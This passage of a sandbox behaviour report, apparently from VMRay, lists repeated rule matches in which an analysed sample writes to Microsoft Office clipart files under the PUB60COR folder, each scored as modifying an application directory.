"artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02451_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02451_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40859", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02451_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02453_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02453_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40866", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02453_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\nbook_01.mid", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40873", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\nbook_01.mid\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ocean_01.mid", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40880", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ocean_01.mid\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\outdr_01.mid", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40887", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\outdr_01.mid\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\paper_01.mid", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40894", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\paper_01.mid\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_01.mid", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40901", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_01.mid\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_02.mid", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40908", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_02.mid\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_03.mid", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40915", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_03.mid\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_04.mid", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40922", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_04.mid\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_05.mid", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40929", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_05.mid\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_06.mid", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40936", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_06.mid\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_07.mid", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40943", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_07.mid\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_08.mid", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40950", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_08.mid\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_09.mid", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40957", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_09.mid\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_10.mid", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40964", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_10.mid\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00013_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00013_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40971", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00013_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00014_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00014_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40980", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00014_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00034_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00034_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40989", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00034_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00049_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00049_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40996", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00049_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00050_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00050_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41005", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00050_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00052_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00052_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41014", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00052_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00231_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00231_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41023", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00231_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00272_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00272_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41030", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00272_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00468_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00468_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41037", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00468_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00478_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00478_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41046", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00478_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00485_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00485_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41053", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00485_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00489_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00489_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41062", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00489_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00531_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00531_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41079", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00531_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00542_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00542_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41086", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00542_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00555_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00555_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41097", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00555_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00559_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00559_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41104", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00559_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00563_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00563_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": 